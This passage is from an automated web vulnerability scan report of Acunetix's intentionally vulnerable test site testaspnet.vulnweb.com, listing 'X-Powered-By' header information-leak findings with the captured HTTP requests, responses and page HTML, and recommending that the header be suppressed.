          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        4. GET http://testaspnet.vulnweb.com/ads/acunetix.gif
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (333 bytes)
          GET http://testaspnet.vulnweb.com/ads/acunetix.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/ads/def.html
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:52 GMT
          Accept-Ranges: bytes
          ETag: "eb3686f99c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 3048
          
          
          Response body (3048 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        5. GET http://testaspnet.vulnweb.com/ads/def.html
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (355 bytes)
          GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (246 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/html
          Last-Modified: Fri, 24 May 2019 07:50:37 GMT
          Accept-Ranges: bytes
          ETag: "eb6cf45f512d51:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 488
          
          
          Response body (488 bytes)
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
          <html>
          	<head>
          		<title></title>
          		<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
          		<meta name="ProgId" content="VisualStudio.HTML">
          		<meta name="Originator" content="Microsoft Visual Studio .NET 7.1">
          	</head>
          	<body>
          		<P align="center"><STRONG>Is your website hackable?<BR>
          				check with<BR>
          				<IMG src="acunetix.gif"><BR>
          				Web Vulnerability Scanner</STRONG></P>
          	</body>
          </html>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        6. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9zWSYY5iwxqgBHXlBfPJ/1TT/YMA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
